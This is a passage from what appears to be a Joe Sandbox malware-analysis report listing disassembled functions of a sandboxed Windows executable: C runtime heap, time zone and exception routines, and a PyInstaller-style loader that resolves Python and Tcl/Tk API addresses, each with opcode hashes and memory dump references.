                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                  • Instruction ID: 898c48b14f221a7b2a60ffd3c6046bd4427b7b94c8b9a2158c2db5ba4f9d907a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E0EC92E08A8743FA647AA855822BD9910AFA4360FD04071DD48063C3ED2CFC4C9732
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF7102DA63A,?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A), ref: 00007FF7102DDEFD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                  • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                  • Instruction ID: 4f6fd54a1f3e7f2b941846a26a43c5b7ad7ee0711daeef9d265f9b4ffb00f3a0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF06D42B09E4785FE65BB6658113B6DB906FA8B60FD84430D90E8A7C1DE2CFC8D8330
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF7102CFFB0,?,?,?,00007FF7102D161A,?,?,?,?,?,00007FF7102D2E09), ref: 00007FF7102DC94A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                  • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                  • Instruction ID: b66641a7b901ad7decbccf79eba50a5acf22d1946a12d6b050cadf510844d3de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCF05E02B1DA8B45FE54767158213B59A805F44770FE84630E82E473C1DE2CF8498730
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                  • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                  • Instruction ID: e95177c0613eecbf49913d1a9bcbca309b6d0c280c5df1230882e4850c34aa18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84316D72618F8186EB60AF60E8403EEB764FB84754F84403ADB4D57B98DF38E548C720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                  • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                  • API String ID: 3971115935-1149178304
                                                                                                                                                                                                  • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                  • Instruction ID: 699346d36107fea3c5fff7d510a2f4ef19bc0b37fb5138230b9c8bf460b0e385
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F211272618E8582E721AB10F4516DBB764FB887D4F800136EACD63B98DF7CE54ACB50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E4F55
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E48BC
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7102D9BEF,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102D9C19
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7102D9BEF,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102D9C3E
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E4F44
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E491C
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51BA
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51CB
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51DC
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7102E541C), ref: 00007FF7102E5203
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                                                  • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                  • Instruction ID: 2725e732b581453a11cc6762f3f697c3dfffd8e5f73bbbfce9f7a15ecc798ea8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D1B126A58A5286EB20FF21D8501B9BB91FF447A4FC4413AEA0D57B85EF3CF449C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                  • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                  • Instruction ID: f734927f2a49a84ac24edb6f62906e2ac9ff7c7cb767a393f19f47b46c99b962
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A319332618F8185DB60DF25E8402AEB7A4FB88764F900136EB8D57B55DF3CE549CB20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                                  • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                  • Instruction ID: 9a6751d48dd4ca2d53db9ded90ede848f4fb2065f2bb27e24210d6760ddaa390
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64B1B722B58E8241EA61AB6198501B9EB91EB44BF4FC45132FD5D27B85DF3CF48AC320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51BA
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E491C
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51CB
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E48BC
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51DC
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E48EC
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7102E541C), ref: 00007FF7102E5203
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3458911817-0
                                                                                                                                                                                                  • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                  • Instruction ID: ff8905ffbdd9d7818128243ef185a5b5f5ba94ed17029985c61b5d4557d103eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B518332A58A5286E710FF21D8811A9FB64FF487A4FC4413AEA4D57795DF3CF4488760
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                                  • Instruction ID: 7a5a47076714c039f073fee3ac2feeb7d39597c18370f1d217b77b2d42fa9b56
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4A0022196CC2BD0E649EF04EA50136BB34FF90320BE01031D54D562A49F3CB409C330
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C50C0
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5101
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5126
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C514B
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5173
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C519B
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C51C3
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C51EB
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5213
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                                                                                  • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                  • Instruction ID: 007de732a26b705d416c45ba53f4c1a18ed0113852da06de165b60f022ed310d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF12D46099EF1791FA16FB44A9101B6ABA4AF49770FE41439C81E22364EF3DF58DC270
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                  • API String ID: 190572456-3427451314
                                                                                                                                                                                                  • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                  • Instruction ID: 5e504b644c3a40f64b5c8a86189c43ec28e7b9216a8c96b11471d89b6c973905
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE1A76499DF4391EA16FB08E9141B5ABA5BF49770FC4503AC81E263A4EF3CB54CC231
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7102C3FA4,00000000,00007FF7102C1925), ref: 00007FF7102C86E9
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7102C7C97,?,?,FFFFFFFF,00007FF7102C3834), ref: 00007FF7102C782C
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C26C0: MessageBoxW.USER32 ref: 00007FF7102C2736
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
